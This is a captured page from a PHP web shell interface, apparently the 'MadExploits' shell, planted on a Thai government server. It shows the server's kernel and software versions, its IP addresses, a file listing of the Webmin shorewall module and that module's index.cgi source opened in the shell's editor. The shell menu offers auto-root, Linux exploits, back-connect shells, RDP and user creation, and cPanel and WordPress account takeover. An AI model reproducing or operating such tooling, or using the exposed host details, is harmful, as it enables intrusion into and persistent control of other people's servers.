Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
webmin /
shorewall /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
CHANGELOG
2.47
KB
-rw-r--r--
acl_security.pl
1
KB
-rwxr-xr-x
backup_config.pl
874
B
-rwxr-xr-x
check.cgi
503
B
-rwxr-xr-x
clear.cgi
313
B
-rwxr-xr-x
config
166
B
-rw-r--r--
config.info
509
B
-rw-r--r--
config.info.ca
565
B
-rw-r--r--
config.info.ca.UTF-8
573
B
-rw-r--r--
config.info.de
566
B
-rw-r--r--
config.info.de.UTF-8
566
B
-rw-r--r--
config.info.es
317
B
-rw-r--r--
config.info.es.UTF-8
317
B
-rw-r--r--
config.info.fr
502
B
-rw-r--r--
config.info.fr.UTF-8
502
B
-rw-r--r--
config.info.ms_MY
404
B
-rw-r--r--
config.info.ms_MY.UTF-8
404
B
-rw-r--r--
config.info.nl
394
B
-rw-r--r--
config.info.nl.UTF-8
394
B
-rw-r--r--
config.info.no
414
B
-rw-r--r--
config.info.no.UTF-8
414
B
-rw-r--r--
defaultacl
19
B
-rw-r--r--
delete.cgi
530
B
-rwxr-xr-x
down.cgi
403
B
-rwxr-xr-x
dump.cgi
337
B
-rwxr-xr-x
edit.cgi
1.69
KB
-rwxr-xr-x
editcmt.cgi
1014
B
-rwxr-xr-x
index.cgi
2.52
KB
-rwxr-xr-x
install_check.pl
380
B
-rwxr-xr-x
list.cgi
3.39
KB
-rwxr-xr-x
log_parser.pl
461
B
-rwxr-xr-x
manual_form.cgi
710
B
-rwxr-xr-x
manual_save.cgi
555
B
-rwxr-xr-x
module.info
169
B
-rw-r--r--
module.info.ca
98
B
-rw-r--r--
module.info.ca.UTF-8
112
B
-rw-r--r--
module.info.cz
27
B
-rw-r--r--
module.info.cz.UTF-8
33
B
-rw-r--r--
module.info.de
120
B
-rw-r--r--
module.info.de.UTF-8
132
B
-rw-r--r--
module.info.es
30
B
-rw-r--r--
module.info.es.UTF-8
36
B
-rw-r--r--
module.info.hu
25
B
-rw-r--r--
module.info.hu.UTF-8
32
B
-rw-r--r--
module.info.ms_MY
119
B
-rw-r--r--
module.info.ms_MY.UTF-8
131
B
-rw-r--r--
module.info.nl
27
B
-rw-r--r--
module.info.nl.UTF-8
33
B
-rw-r--r--
module.info.no
27
B
-rw-r--r--
module.info.no.UTF-8
33
B
-rw-r--r--
refresh.cgi
427
B
-rwxr-xr-x
restart.cgi
423
B
-rwxr-xr-x
save.cgi
1.08
KB
-rwxr-xr-x
savecmt.cgi
867
B
-rwxr-xr-x
shorewall-lib.pl
57.9
KB
-rwxr-xr-x
start.cgi
413
B
-rwxr-xr-x
status.cgi
343
B
-rwxr-xr-x
stop.cgi
312
B
-rwxr-xr-x
up.cgi
397
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.cgi
#!/usr/bin/perl # index.cgi # Display icons for the various shorewall configuration files require './shorewall-lib.pl'; if (!&has_command($config{'shorewall'})) { &ui_print_header(undef, $text{'index_title'}, "", undef, 1, 1); print "<p>",&text('index_ecmd', "<tt>$config{'shorewall'}</tt>", "$gconfig{'webprefix'}/config.cgi?$module_name"),"<p>\n"; } else { # Get the version $shorewall_version = &get_shorewall_version(1); &open_tempfile(VERSION, ">$module_config_directory/version"); &print_tempfile(VERSION, $shorewall_version,"\n"); &close_tempfile(VERSION); &ui_print_header(undef, $text{'index_title'}, "", undef, 1, 1, 0, &help_search_link("shorewall", "doc", "google"), undef, undef, &text('index_version', &get_printable_version($shorewall_version))); if (!-d $config{'config_dir'}) { # Config dir not found! print "<p>",&text('index_edir', "<tt>$config{'config_dir'}</tt>", "$gconfig{'webprefix'}/config.cgi?$module_name"),"<p>\n"; } else { # Just show the file icons @files = grep { &can_access($_) } @shorewall_files; @titles = map { $text{&clean_name($_)."_title"}."<br>($_)" } @files; @links = map { "list.cgi?table=".$_ } @files; @icons = map { "images/".$_.".gif" } @files; &icons_table(\@links, \@titles, \@icons, 4); # Check if shorewall is running by looking for the 'shorewall' # chain in the filter table print &ui_hr(); print &ui_buttons_start(); my $ex = system("$config{'shorewall'} status 2>&1"); if ($ex && !$access{'nochange'}) { # Down .. offer to start print &ui_buttons_row( "start.cgi", $text{'index_start'}, $text{'index_startdesc'}); } elsif (!$ex && !$access{'nochange'}) { # Up .. offer to restart, clear and stop print &ui_buttons_row( "restart.cgi", $text{'index_restart'}, $text{'index_restartdesc'}); print &ui_buttons_row( "refresh.cgi", $text{'index_refresh'}, $text{'index_refreshdesc'}); print &ui_buttons_row( "clear.cgi", $text{'index_clear'}, $text{'index_cleardesc'}); print &ui_buttons_row( "stop.cgi", $text{'index_stop'}, $text{'index_stopdesc'}); } if (!$ex) { print &ui_buttons_row( "status.cgi", $text{'index_status'}, $text{'index_statusdesc'}); } # Check and dump buttons print &ui_buttons_row( "check.cgi", $text{'index_check'}, $text{'index_checkdesc'}); print &ui_buttons_row( "dump.cgi", $text{'index_dump'}, $text{'index_dumpdesc'}); print &ui_buttons_end(); } } &ui_print_footer("/", $text{'index'});
Close